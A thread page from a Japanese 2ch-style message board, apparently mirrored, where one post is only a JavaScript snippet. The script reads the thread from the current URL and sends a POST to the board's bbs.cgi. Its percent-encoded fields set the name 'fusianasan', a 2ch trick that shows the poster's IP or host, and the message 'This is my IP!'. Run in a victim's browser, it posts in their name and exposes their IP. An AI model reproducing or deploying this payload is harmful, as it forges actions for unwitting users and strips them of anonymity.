はい (31レス)
1-

30: 2016/10/20(木)21:18 ID:VZx(2/2) AAS
var url = window.location.href;
url.match(/^http:\/\/(.+)\/test\/read\..+\/(.+)\/(\d{10})/)
server = RegExp.$1; board = RegExp.$2; thread = RegExp.$3;
FROM = "FROM=%66%75%73%69%61%6e%61%73%61%6e";
mail = "%61%67%65"; bbs = "&bbs=" + board; key = "&key=" + thread;
MESSAGE = "&MESSAGE=%54%68%69%73%20%69%73%20%6d%79%20%49%50%21";
submit = "&submit=%E6%9B%B8";
data = FROM + mail + MESSAGE + bbs + key + submit;
var xhr= new XMLHttpRequest();
xhr.open("POST","/test/bbs.cgi");
xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded; charset=UTF-8');
xhr.send(data);
1-
あと 1 レスあります
スレ情報 赤レス抽出 画像レス抽出 歴の未読スレ AAサムネイル

ぬこの手 ぬこTOP 0.077s*